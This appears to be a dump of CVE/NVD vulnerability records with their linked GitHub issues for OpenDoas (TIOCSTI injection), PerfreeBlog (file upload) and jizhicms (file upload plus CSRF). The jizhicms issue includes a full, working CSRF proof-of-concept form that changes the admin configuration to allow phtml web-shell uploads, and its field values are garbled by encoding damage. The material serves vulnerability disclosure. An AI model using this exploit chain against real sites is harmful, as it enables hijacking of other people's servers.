[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/Duncaen/OpenDoas/issues/106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/Duncaen/OpenDoas/issues/106" }, { "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": [ "Issue Tracking" ], "url": "https://github.com/Duncaen/OpenDoas/issues/106" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opendoas_project:opendoas:*:*:*:*:*:*:*:*", "matchCriteriaId": "49F67D80-C707-4645-B019-A5AB2F56B445", "versionEndExcluding": null, "versionEndIncluding": "6.8.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/Duncaen/OpenDoas/issues/106
[ "Issue Tracking" ]
github.com
[ "Duncaen", "OpenDoas" ]
This is written from the perspective of Arch Linux. Some man page quotes or commands might be different on other distributions. I am using the [opendoas](https://archlinux.org/packages/community/x86_64/opendoas/) package. Excerpt of the `su` manpage documenting the `--pty` argument: > Create a pseudo-terminal for the session. The independent terminal provides better security as the user does not share a terminal with the original session. This can be used to avoid TIOCSTI ioctl terminal injection and other security attacks against terminal file descriptors. The entire session can also be moved to the background (e.g., su --pty - username -c application &). If the pseudo-terminal is enabled, then su works as a proxy between the sessions (sync stdin and stdout). OpenDoas is vulnerable to "security attacks against terminal file descriptors". I have have verified the TIOCSTI attack on my system and expect that it would still work if compiled from source. OpenDoas does not have a `--pty` equivalent. There should at least be a clear warning in the manpage that running commands as another user (with a tty attached like when running interactively), allows that user to take over the current user running OpenDoas. Few people are aware of this. https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking has a good summary of the TIOCSTI issue. Note that this page highlights going from root to a non root user but the vulnerability also exists going from a non root user to another non root user. https://github.com/containers/bubblewrap/issues/142 , https://news.ycombinator.com/item?id=17311808 and other links from there has more context. Other tools like su and sudo have been vulnerable to this in the past and did not always have the `--pty` argument. OpenBSD is not vulnerable to the TIOCSTI attack because they have (rightly, I wish Linux did too) [disabled](https://isopenbsdsecu.re/mitigations/tiocsti/) this syscall. Even so, the manpage quote mentions "other attacks" that I haven't seen documented clearly, which might still be serious.
security vulnerability: TIOCSTI tty character injection
https://api.github.com/repos/Duncaen/OpenDoas/issues/106/comments
20
2022-11-05T22:38:55Z
2024-01-30T08:56:06Z
https://github.com/Duncaen/OpenDoas/issues/106
1,437,207,434
106
4,834
CVE-2023-27757
2023-03-15T03:15:08.437
An arbitrary file upload vulnerability in the /admin/user/uploadImg component of PerfreeBlog v3.1.1 allows attackers to execute arbitrary code via a crafted JPG file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/perfree/PerfreeBlog/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/perfree/PerfreeBlog/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:perfree:perfreeblog:3.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "3B3CBCF1-FE8B-4C5F-B3F4-3FD93332221A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/perfree/PerfreeBlog/issues/13
[ "Exploit", "Issue Tracking" ]
github.com
[ "perfree", "PerfreeBlog" ]
Affected versions๏ผšv3.1.1 ## The steps to reproduce Register an ordinary user arbitrarily, and upload the avatar ![image](https://user-images.githubusercontent.com/78067010/222031131-123b5049-da1c-487f-b437-7da3e70d05a7.png) The front-end restricts the file type, and can only upload image-type files You can modify the suffix of the malicious file to jpg and then modify it back through packet capture ![image](https://user-images.githubusercontent.com/78067010/222031444-2058b74e-70b1-4ff9-8c10-f9aaf386acc8.png) ## repair suggestion -The backend increases the inspection of file types and uses whitelist filtering - Filter with blacklist
There are arbitrary file uploads where ordinary users upload avatars
https://api.github.com/repos/PerfreeBlog/PerfreeBlog/issues/13/comments
0
2023-03-01T02:44:58Z
2024-06-05T02:41:49Z
https://github.com/PerfreeBlog/PerfreeBlog/issues/13
1,604,133,013
13
4,835
CVE-2023-27234
2023-03-15T05:15:42.897
A Cross-Site Request Forgery (CSRF) in /Sys/index.html of Jizhicms v2.4.5 allows attackers to arbitrarily make configuration changes within the application.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/85" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "6B00EB2D-0404-461A-A787-2E7479F0E624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/Cherry-toto/jizhicms/issues/85
[ "Exploit", "Issue Tracking" ]
github.com
[ "Cherry-toto", "jizhicms" ]
The file upload vulnerability file address: \app\admin\c\CommonController.php It can be seen that uploads uses the blacklist and whitelist verification method for the suffix of uploaded files, but the blacklist lacks the restriction on the suffix phtml, which causes the file upload suffix to be bypassed![1](https://user-images.githubusercontent.com/112733473/221190709-116828d9-9d14-47b5-9e36-e7a7c4c3c129.png) For users who have logged in to the background, you can add a phtml to the file suffix in the whitelist, and then you can upload a sentence of the suffix phtml Trojan Horse ![2](https://user-images.githubusercontent.com/112733473/221191668-71a4d270-1b01-4795-9bde-3f07b119586e.png) ![3](https://user-images.githubusercontent.com/112733473/221192515-73362136-c9db-449c-a323-8ad444e5a417.png) Visible file uploaded successfully and returned to the upload path ![4](https://user-images.githubusercontent.com/112733473/221193098-31f054fe-f633-4f31-aa51-b444c0f6323d.png) Repair method:Blacklist phtml files The CSRF vulnerability ๏ผš After the administrator logged in, open the following page phtml will be included in the white list, and other configuration items can also be modified ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST"> <input type="hidden" name="web&#95;name" value="๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;CMS๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;" /> <input type="hidden" name="web&#95;keyword" value="๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;&#44;cms&#44;๏ฟฝ&#188;&#128;๏ฟฝ&#144;cms&#44;๏ฟฝ&#133;&#141;๏ฟฝ&#180;&#185;cms&#44;cms๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;&#44;phpcms&#44;๏ฟฝ&#133;&#141;๏ฟฝ&#180;&#185;๏ฟฝ&#188;&#129;๏ฟฝ&#184;&#154;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;&#44;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;&#44;๏ฟฝ&#188;&#129;๏ฟฝ&#184;&#154;cms&#44;jizhicms&#44;๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;cms&#44;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;cms&#44;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;&#44;๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;๏ฟฝ&#141;&#154;๏ฟฝ&#174;&#162;&#44;๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;blog&#44;๏ฟฝ&#134;&#133;๏ฟฝ&#174;&#185;๏ฟฝ&#174;&#161;๏ฟฝ&#144;&#134;๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;" /> <input type="hidden" name="web&#95;desc" value="๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;CMS๏ฟฝ&#152;&#175;๏ฟฝ&#188;&#128;๏ฟฝ&#144;๏ฟฝ&#133;&#141;๏ฟฝ&#180;&#185;๏ฟฝ&#154;&#132;PHPCMS๏ฟฝ&#189;&#145;๏ฟฝ&#171;&#153;๏ฟฝ&#134;&#133;๏ฟฝ&#174;&#185;๏ฟฝ&#174;&#161;๏ฟฝ&#144;&#134;๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;๏ฟฝ&#188;&#140;๏ฟฝ&#151;&#160;๏ฟฝ&#149;&#134;๏ฟฝ&#184;&#154;๏ฟฝ&#142;&#136;๏ฟฝ&#157;&#131;๏ฟฝ&#188;&#140;๏ฟฝ&#174;&#128;๏ฟฝ&#141;&#149;๏ฟฝ&#152;&#147;๏ฟฝ&#148;&#168;๏ฟฝ&#188;&#140;๏ฟฝ&#143;&#144;๏ฟฝ&#190;&#155;๏ฟฝ&#184;&#176;๏ฟฝ&#175;&#140;๏ฟฝ&#154;&#132;๏ฟฝ&#143;&#146;๏ฟฝ&#187;&#182;๏ฟฝ&#188;&#140;๏ฟฝ&#184;&#174;๏ฟฝ&#130;&#168;๏ฟฝ&#174;&#158;๏ฟฝ&#142;&#176;๏ฟฝ&#155;&#182;๏ฟฝ&#159;๏ฟฝ๏ฟฝ&#161;&#128;๏ฟฝ&#144;&#173;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#184;&#141;๏ฟฝ&#144;&#140;๏ฟฝ&#177;&#187;๏ฟฝ&#158;&#139;๏ฟฝ&#189;&#145;๏ฟฝ&#171;&#153;๏ฟฝ&#188;&#136;๏ฟฝ&#188;&#129;๏ฟฝ&#184;&#154;๏ฟฝ&#171;&#153;๏ฟฝ&#188;&#140;๏ฟฝ&#151;&#168;๏ฟฝ&#136;&#183;๏ฟฝ&#171;&#153;๏ฟฝ&#188;&#140;๏ฟฝ&#184;๏ฟฝไบบ๏ฟฝ&#141;&#154;๏ฟฝ&#174;&#162;๏ฟฝ&#171;&#153;๏ฟฝ&#173;&#137;๏ฟฝ&#188;&#137;๏ฟฝ&#188;&#140;๏ฟฝ&#152;&#175;๏ฟฝ&#130;&#168;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;๏ฟฝ&#154;&#132;๏ฟฝ&#165;&#189;๏ฟฝ&#184;&#174;๏ฟฝ&#137;&#139;๏ฟฝ&#128;&#130;๏ฟฝ&#158;&#129;๏ฟฝ&#128;&#159;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;๏ฟฝ&#188;&#140;๏ฟฝ&#176;&#177;๏ฟฝ&#128;&#137;๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;CMS๏ฟฝ&#128;&#130;" /> <input type="hidden" name="web&#95;copyright" value="&#64;2020&#45;2099" /> <input type="hidden" name="web&#95;beian" value="๏ฟฝ&#134;&#128;ICP๏ฟฝ&#164;&#135;88888๏ฟฝ&#143;&#183;" /> <input type="hidden" name="web&#95;tel" value="0666&#45;8888888" /> <input type="hidden" name="web&#95;tel&#95;400" value="400&#45;0000&#45;000" /> <input type="hidden" name="web&#95;qq" value="12345678" /> <input type="hidden" name="web&#95;email" value="123456&#64;qq&#46;com" /> <input type="hidden" name="web&#95;address" value="๏ฟฝ&#178;&#179;๏ฟฝ&#140;&#151;๏ฟฝ&#156;&#129;๏ฟฝ&#187;&#138;๏ฟฝ&#157;&#138;๏ฟฝ&#184;&#130;๏ฟฝ&#185;&#191;๏ฟฝ&#152;&#179;๏ฟฝ&#140;๏ฟฝxxx๏ฟฝ&#164;&#167;๏ฟฝ&#142;&#166;xx๏ฟฝ&#165;&#188;001๏ฟฝ&#143;&#183;" /> <input type="hidden" name="web&#95;logo" value="&#47;static&#47;cms&#47;static&#47;images&#47;logo&#46;png" /> <input type="hidden" name="file" value="" /> <input type="hidden" name="domain" value="" /> <input type="hidden" name="mingan" value="" /> <input type="hidden" name="closeweb" value="0" /> <input type="hidden" name="closetip" value="๏ฟฝ&#138;&#177;๏ฟฝ&#173;&#137;๏ฟฝ&#188;&#129;๏ฟฝ&#175;&#165;๏ฟฝ&#171;&#153;๏ฟฝ&#130;&#185;๏ฟฝ&#183;&#178;๏ฟฝ&#187;&#143;๏ฟฝ&#162;&#171;๏ฟฝ&#174;&#161;๏ฟฝ&#144;&#134;๏ฟฝ&#145;&#152;๏ฟฝ&#129;&#156;๏ฟฝ&#173;&#162;๏ฟฝ&#191;&#144;๏ฟฝ&#161;&#140;๏ฟฝ&#188;&#140;๏ฟฝ&#175;&#183;๏ฟฝ&#129;&#148;๏ฟฝ&#179;&#187;๏ฟฝ&#174;&#161;๏ฟฝ&#144;&#134;๏ฟฝ&#145;&#152;๏ฟฝ&#134;๏ฟฝ&#167;&#163;๏ฟฝ&#175;&#166;๏ฟฝ&#131;&#133;๏ฟฝ&#188;&#129;" /> <input type="hidden" name="web&#95;phone" value="0" /> <input type="hidden" name="web&#95;weixin" value="" /> <input type="hidden" name="pc&#95;template" value="cms" /> <input type="hidden" name="wap&#95;template" value="cms" /> <input type="hidden" name="weixin&#95;template" value="cms" /> <input type="hidden" name="iswap" value="1" /> <input type="hidden" name="isopenhomeupload" value="1" /> <input type="hidden" name="isopenhomepower" value="0" /> <input type="hidden" name="cache&#95;time" value="0" /> <input type="hidden" name="fileSize" value="0" /> <input type="hidden" name="fileType" value="pdf&#124;jpg&#124;jpeg&#124;png&#124;zip&#124;rar&#124;gzip&#124;doc&#124;docx&#124;xlsx&#124;phtml" /> <input type="hidden" name="ueditor&#95;config" value="&quot;fullscreen&quot;&#44;&#32;&quot;source&quot;&#44;&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&quot;bold&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;underline&quot;&#44;&#32;&quot;fontborder&quot;&#44;&#32;&quot;strikethrough&quot;&#44;&#32;&quot;super&quot;&#44;&#32;&quot;removeformat&quot;&#44;&#32;&quot;formatmatch&quot;&#44;&#32;&quot;autotypeset&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;pasteplain&quot;&#44;&quot;forecolor&quot;&#44;&#32;&quot;backcolor&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&#32;&quot;selectall&quot;&#44;&#32;&quot;cleardoc&quot;&#44;&quot;rowspacingtop&quot;&#44;&#32;&quot;rowspacingbottom&quot;&#44;&#32;&quot;lineheight&quot;&#44;&quot;customstyle&quot;&#44;&#32;&quot;paragraph&quot;&#44;&#32;&quot;fontfamily&quot;&#44;&#32;&quot;fontsize&quot;&#44;&quot;directionalityltr&quot;&#44;&#32;&quot;directionalityrtl&quot;&#44;&#32;&quot;indent&quot;&#44;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&#32;&quot;justifyjustify&quot;&#44;&quot;touppercase&quot;&#44;&#32;&quot;tolowercase&quot;&#44;&quot;link&quot;&#44;&#32;&quot;unlink&quot;&#44;&#32;&quot;anchor&quot;&#44;&#32;&quot;imagenone&quot;&#44;&#32;&quot;imageleft&quot;&#44;&#32;&quot;imageright&quot;&#44;&#32;&quot;imagecenter&quot;&#44;&quot;simpleupload&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;emotion&quot;&#44;&#32;&quot;scrawl&quot;&#44;&#32;&quot;insertvideo&quot;&#44;&#32;&quot;music&quot;&#44;&#32;&quot;attachment&quot;&#44;&#32;&quot;map&quot;&#44;&#32;&quot;gmap&quot;&#44;&#32;&quot;insertframe&quot;&#44;&#32;&quot;insertcode&quot;&#44;&#32;&quot;webapp&quot;&#44;&#32;&quot;pagebreak&quot;&#44;&quot;template&quot;&#44;&#32;&quot;background&quot;&#44;&quot;horizontal&quot;&#44;&#32;&quot;date&quot;&#44;&#32;&quot;time&quot;&#44;&#32;&quot;spechars&quot;&#44;&#32;&quot;snapscreen&quot;&#44;&#32;&quot;wordimage&quot;&#44;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&#32;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;charts&quot;&#44;&quot;print&quot;&#44;&#32;&quot;preview&quot;&#44;&#32;&quot;searchreplace&quot;&#44;&#32;&quot;help&quot;&#44;&#32;&quot;drafts&quot;" /> <input type="hidden" name="ueditor&#95;user&#95;config" value="&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;paragraph&quot;&#44;&quot;bold&quot;&#44;&quot;forecolor&quot;&#44;&quot;fontfamily&quot;&#44;&quot;fontsize&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;insertparagraph&quot;&#44;&#32;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&quot;justifyjustify&quot;&#44;&quot;&#124;&quot;&#44;&quot;indent&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&quot;&#124;&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;drafts&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;fullscreen&quot;" /> <input type="hidden" name="classtypemaxlevel" value="0" /> <input type="hidden" name="onlyuserupload" value="1" /> <input type="hidden" name="imagequlity" value="75" /> <input type="hidden" name="ispngcompress" value="0" /> <input type="hidden" name="admintpl" value="default" /> <input type="hidden" name="islevelurl" value="0" /> <input type="hidden" name="iscachepage" value="1" /> <input type="hidden" name="isautohtml" value="0" /> <input type="hidden" name="pc&#95;html" value="&#47;" /> <input type="hidden" name="mobile&#95;html" value="m" /> <input type="hidden" name="autocheckmessage" value="0" /> <input type="hidden" name="autocheckcomment" value="1" /> <input type="hidden" name="iswatermark" value="0" /> <input type="hidden" name="watermark&#95;file" value="" /> <input type="hidden" name="watermark&#95;t" value="9" /> <input type="hidden" name="watermark&#95;tm" value="0" /> <input type="hidden" name="admin&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" /> <input type="hidden" name="home&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" /> <input type="hidden" name="isajax" value="0" /> <input type="hidden" name="isregister" value="1" /> <input type="hidden" name="onlyinvite" value="0" /> <input type="hidden" name="release&#95;table" value="article&#124;product" /> <input type="hidden" name="closehomevercode" value="0" /> <input type="hidden" name="closeadminvercode" value="0" /> <input type="hidden" name="tag&#95;table" value="article&#124;product" /> <input type="hidden" name="isdebug" value="1" /> <input type="hidden" name="closesession" value="0" /> <input type="hidden" name="messageyzm" value="1" /> <input type="hidden" name="homerelease" value="1" /> <input type="hidden" name="hideclasspath" value="0" /> <input type="hidden" name="hidetitleonliy" value="article&#45;title&#124;product&#45;title" /> <input type="hidden" name="cachefilenum" value="100" /> <input type="hidden" name="search&#95;table" value="article&#124;product" /> <input type="hidden" name="search&#95;words" value="title" /> <input type="hidden" name="search&#95;words&#95;muti" value="title" /> <input type="hidden" name="search&#95;table&#95;muti" value="article&#124;product" /> <input type="hidden" name="search&#95;fields&#95;muti" value="id&#44;tid&#44;litpic&#44;title&#44;tags&#44;keywords&#44;molds&#44;htmlurl&#44;description&#44;addtime&#44;userid&#44;member&#95;id&#44;hits&#44;ownurl&#44;target" /> <input type="hidden" name="email&#95;server" value="smtp&#46;163&#46;com" /> <input type="hidden" name="email&#95;port" value="465" /> <input type="hidden" name="shou&#95;email" value="" /> <input type="hidden" name="send&#95;email" value="" /> <input type="hidden" name="send&#95;pass" value="" /> <input type="hidden" name="send&#95;name" value="๏ฟฝ&#158;&#129;๏ฟฝ&#135;&#180;๏ฟฝ&#187;๏ฟฝ๏ฟฝ&#171;&#153;๏ฟฝ&#179;&#187;๏ฟฝ&#187;&#159;" /> <input type="hidden" name="tj&#95;msg" value="๏ฟฝ&#176;&#138;๏ฟฝ&#149;&#172;๏ฟฝ&#154;&#132;&#123;xxx&#125;๏ฟฝ&#188;&#140;๏ฟฝ&#136;&#145;๏ฟฝ&#187;&#172;๏ฟฝ&#183;&#178;๏ฟฝ&#187;&#143;๏ฟฝ&#148;&#182;๏ฟฝ&#136;&#176;๏ฟฝ&#130;&#168;๏ฟฝ&#154;&#132;๏ฟฝ&#174;&#162;๏ฟฝ&#141;&#149;๏ฟฝ&#188;&#129;๏ฟฝ&#175;&#183;๏ฟฝ&#149;&#153;๏ฟฝ&#132;&#143;๏ฟฝ&#130;&#168;๏ฟฝ&#154;&#132;๏ฟฝ&#148;๏ฟฝ๏ฟฝ&#173;&#144;๏ฟฝ&#130;&#174;๏ฟฝ&#187;&#182;๏ฟฝ&#187;&#165;๏ฟฝ&#142;&#183;๏ฟฝ&#190;&#151;๏ฟฝ&#156;&#128;๏ฟฝ&#150;&#176;๏ฟฝ&#182;&#136;๏ฟฝ&#129;&#175;๏ฟฝ&#188;&#140;๏ฟฝ&#176;&#162;๏ฟฝ&#176;&#162;๏ฟฝ&#130;&#168;๏ฟฝ&#188;&#129;" /> <input type="hidden" name="send&#95;msg" value="๏ฟฝ&#176;&#138;๏ฟฝ&#149;&#172;๏ฟฝ&#154;&#132;&#123;xxx&#125;๏ฟฝ&#188;&#140;๏ฟฝ&#136;&#145;๏ฟฝ&#187;&#172;๏ฟฝ&#183;&#178;๏ฟฝ&#161;&#174;๏ฟฝ&#174;&#164;๏ฟฝ&#134;๏ฟฝ&#130;&#168;๏ฟฝ&#154;&#132;๏ฟฝ&#174;&#162;๏ฟฝ&#141;&#149;๏ฟฝ&#188;&#140;๏ฟฝ&#175;&#183;๏ฟฝ&#142;3๏ฟฝ&#151;&#165;๏ฟฝ&#134;&#133;๏ฟฝ&#177;&#135;๏ฟฝ&#172;&#190;๏ฟฝ&#188;&#140;๏ฟฝ&#128;&#190;๏ฟฝ&#156;&#159;๏ฟฝ&#129;&#149;๏ฟฝ&#184;&#141;๏ฟฝ&#191;&#157;๏ฟฝ&#149;&#153;๏ฟฝ&#188;&#140;๏ฟฝ&#184;&#141;๏ฟฝ&#190;&#191;๏ฟฝ&#175;&#183;๏ฟฝ&#167;&#129;๏ฟฝ&#176;&#133;๏ฟฝ&#128;&#130;๏ฟฝ&#177;&#135;๏ฟฝ&#172;&#190;๏ฟฝ&#174;&#140;๏ฟฝ&#136;&#144;๏ฟฝ&#144;&#142;๏ฟฝ&#188;&#140;๏ฟฝ&#131;&#166;๏ฟฝ&#175;&#183;๏ฟฝ&#145;&#138;๏ฟฝ&#159;&#165;๏ฟฝ&#174;&#162;๏ฟฝ&#156;&#141;ไบบ๏ฟฝ&#145;&#152;๏ฟฝ&#130;&#168;๏ฟฝ&#154;&#132;๏ฟฝ&#164;๏ฟฝ&#152;&#147;๏ฟฝ&#180;&#166;๏ฟฝ&#143;&#183;๏ฟฝ&#144;&#142;๏ฟฝ&#148;๏ฟฝ&#189;&#141;๏ฟฝ&#188;&#140;๏ฟฝ&#141;&#179;๏ฟฝ&#174;&#140;๏ฟฝ&#136;&#144;๏ฟฝ&#184;&#139;๏ฟฝ&#141;&#149;๏ฟฝ&#137;&#139;๏ฟฝ&#187;&#173;๏ฟฝ&#188;&#140;๏ฟฝ&#176;&#162;๏ฟฝ&#176;&#162;๏ฟฝ&#130;&#168;๏ฟฝ&#128;&#130;" /> <input type="hidden" name="yunfei" value="0&#46;00" /> <input type="hidden" name="overtime" value="4" /> <input type="hidden" name="isopenemail" value="1" /> <input type="hidden" name="paytype" value="0" /> <input type="hidden" name="alipay&#95;partner" value="" /> <input type="hidden" name="alipay&#95;key" value="" /> <input type="hidden" name="alipay&#95;private&#95;key" value="" /> <input type="hidden" name="alipay&#95;public&#95;key" value="" /> <input type="hidden" name="wx&#95;mchid" value="" /> <input type="hidden" name="wx&#95;key" value="" /> <input type="hidden" name="wx&#95;appid" value="" /> <input type="hidden" name="wx&#95;appsecret" value="" /> <input type="hidden" name="wx&#95;client&#95;cert" value="" /> <input type="hidden" name="wx&#95;client&#95;key" value="" /> <input type="hidden" name="wx&#95;token" value="" /> <input type="hidden" name="money&#95;exchange" value="1" /> <input type="hidden" name="jifen&#95;exchange" value="100" /> <input type="hidden" name="isopenjifen" value="1" /> <input type="hidden" name="isopenqianbao" value="1" /> <input type="hidden" name="isopenweixin" value="1" /> <input type="hidden" name="isopenzfb" value="1" /> <input type="hidden" name="isopendmf" value="1" /> <input type="hidden" name="wx&#95;login&#95;appid" value="" /> <input type="hidden" name="wx&#95;login&#95;appsecret" value="" /> <input type="hidden" name="wx&#95;login&#95;token" value="" /> <input type="hidden" name="huanying" value="๏ฟฝ&#172;&#162;๏ฟฝ&#191;&#142;๏ฟฝ&#133;&#179;๏ฟฝ&#179;&#168;๏ฟฝ&#133;&#172;๏ฟฝ&#188;&#151;๏ฟฝ&#143;&#183;&#126;" /> <input type="hidden" name="login&#95;award" value="1" /> <input type="hidden" name="login&#95;award&#95;open" value="1" /> <input type="hidden" name="release&#95;award&#95;open" value="1" /> <input type="hidden" name="release&#95;award" value="1" /> <input type="hidden" name="release&#95;max&#95;award" value="0" /> <input type="hidden" name="collect&#95;award&#95;open" value="1" /> <input type="hidden" name="collect&#95;award" value="1" /> <input type="hidden" name="collect&#95;max&#95;award" value="1000" /> <input type="hidden" name="likes&#95;award&#95;open" value="1" /> <input type="hidden" name="likes&#95;award" value="1" /> <input type="hidden" name="likes&#95;max&#95;award" value="1000" /> <input type="hidden" name="comment&#95;award&#95;open" value="1" /> <input type="hidden" name="comment&#95;award" value="1" /> <input type="hidden" name="comment&#95;max&#95;award" value="1000" /> <input type="hidden" name="follow&#95;award&#95;open" value="1" /> <input type="hidden" name="follow&#95;award" value="1" /> <input type="hidden" name="follow&#95;max&#95;award" value="1000" /> <input type="hidden" name="invite&#95;award&#95;open" value="0" /> <input type="hidden" name="invite&#95;type" value="jifen" /> <input type="hidden" name="invite&#95;award" value="0" /> <input type="hidden" name="custom&#95;type" value="0" /> <input type="hidden" name="custom&#95;title" value="" /> <input type="hidden" name="custom&#95;fields" value="" /> <input type="hidden" name="custom&#95;ctype" value="1" /> <input type="hidden" name="custom&#95;tips" value="" /> <input type="hidden" name="custom&#95;config" value="" /> <input type="hidden" name="custom&#95;new&#95;title" value="" /> <input type="hidden" name="custom&#95;new&#95;fields" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ```
jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability
https://api.github.com/repos/Cherry-toto/jizhicms/issues/85/comments
1
